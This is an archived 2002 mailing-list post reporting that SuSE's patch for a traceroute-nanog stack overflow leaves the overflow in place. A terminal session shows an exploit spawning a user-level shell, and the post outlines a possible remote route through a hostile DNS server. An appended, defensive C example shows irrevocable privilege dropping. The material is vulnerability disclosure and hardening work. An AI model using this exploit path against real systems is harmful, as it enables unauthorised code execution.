RE: Exploit for traceroute-nanog overflow

From: Carl Livitt (carlat_private)
Date: Mon Dec 02 2002 - 10:36:26 PST

    Hi all,
    
    Further to my email posting a working exploit for traceroute-nanog on SuSE 
    boxes, it would appear that the patch provided by SuSE does not address the 
    overflow my exploit... um... exploits.
    
    On a patched SuSE 7.2 box:
    
    carl@titan:~/exploits/traceroute-nanog > rpm -qa | grep traceroute
    traceroute-6.1.1-0
    carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -d
    Now run this exploit with the '-e' flag.
    carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -e
    traceroute to www.yahoo.akadns.net (64.58.76.230), 30 hops max, 40 byte packets
     1 sh-2.05$ id
    uid=500(carl) gid=100(users) groups=100(users)
    sh-2.05$
    
    Note that traceroute now drops root privileges (properly; there is no way to 
    get them back), so even though it is still possible to execute arbitrary code 
    via a stack overflow, it cannot be done as root.
    
    Of course, if an attacker could control the server that traceroute uses to 
    look up DNS admin contact names, then it would be possible to exploit this 
    flaw remotely. However, the default server used by traceroute is 'localhost', 
    which makes this almost impossible to exploit in any other way except locally 
    on an unpatched system.
    
    Cheers,
    Carl.
    
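The point of the post above is that the SuSE patch did not remove the overflow, it made the privilege drop irrevocable, so the shell that pops is the caller's and not root's. The following is an added example (not Carl's code and not from the traceroute-nanog or SuSE sources) showing the difference between a seteuid-only drop, after which a payload can simply call seteuid(0) again because the saved set-user-ID is still 0, and a full real/effective/saved drop, plus the check an auditor would run afterwards to confirm root really cannot be regained. The unprivileged uid/gid 65534 is an assumption used only when the demo starts as root; setresuid/setresgid are Linux/glibc calls.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical unprivileged uid/gid used only when the demo starts as root
 * (65534 is "nobody" on most Linux systems; the value is an assumption). */
#define DEMO_UNPRIV_UID ((uid_t)65534)
#define DEMO_UNPRIV_GID ((gid_t)65534)

/* Passive check: 1 if any of real/effective/saved uid is still 0 (root can
 * be regained), 0 if the drop is irrevocable, -1 on error. */
int can_regain_root(void)
{
    uid_t r, e, s;
    if (getresuid(&r, &e, &s) != 0)
        return -1;
    return (r == 0 || e == 0 || s == 0) ? 1 : 0;
}

/* Active check: try to get root back the way an exploit payload would.
 * Returns 1 if either call succeeded, 0 if both were refused. */
int try_regain_root(void)
{
    if (setresuid(0, 0, 0) == 0 || seteuid(0) == 0)
        return 1;
    return 0;
}

/* The wrong way: only the effective uid changes, the saved set-user-ID stays
 * 0, so seteuid(0) succeeds again. Returns 1 if root was regained, 0 if not,
 * -1 when the process is not root (nothing to demonstrate, no state change). */
int demo_effective_only_drop(uid_t unpriv)
{
    if (geteuid() != 0)
        return -1;
    if (seteuid(unpriv) != 0)
        return -1;
    return (seteuid(0) == 0) ? 1 : 0;   /* euid is 0 again on success */
}

/* The right way: supplementary groups first (needs root), then all three
 * gids, then all three uids, then verify before doing anything else.
 * Returns 0 on success, -1 on failure with errno set. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    /* If root can still be regained, treat the drop as failed. */
    if (uid != 0 && (can_regain_root() != 0 || try_regain_root() != 0)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Stay who we are if already unprivileged, otherwise drop to the demo ids. */
int demo_permanent_drop(void)
{
    uid_t uid = (geteuid() == 0) ? DEMO_UNPRIV_UID : getuid();
    gid_t gid = (geteuid() == 0) ? DEMO_UNPRIV_GID : getgid();
    return drop_privileges_permanently(uid, gid);
}

int main(void)
{
    int r = demo_effective_only_drop(DEMO_UNPRIV_UID);
    printf("seteuid-only drop: %s\n",
           r == 1 ? "root regained (BAD)" :
           r == 0 ? "not regained" : "skipped (not running as root)");
    if (demo_permanent_drop() != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("after permanent drop: uid=%u euid=%u can_regain_root=%d try_regain_root=%d\n",
           (unsigned)getuid(), (unsigned)geteuid(),
           can_regain_root(), try_regain_root());
    return 0;
}
```

Build with `gcc -Wall -o privdrop privdrop.c`. Run as an ordinary user it just confirms the drop is a no-op that cannot escalate; run as root (or from a setuid-root copy) the first line reports the seteuid-only drop regaining root, while after the permanent drop both checks report 0, which is exactly the property the patched traceroute relies on.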



    This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 13:42:32 PST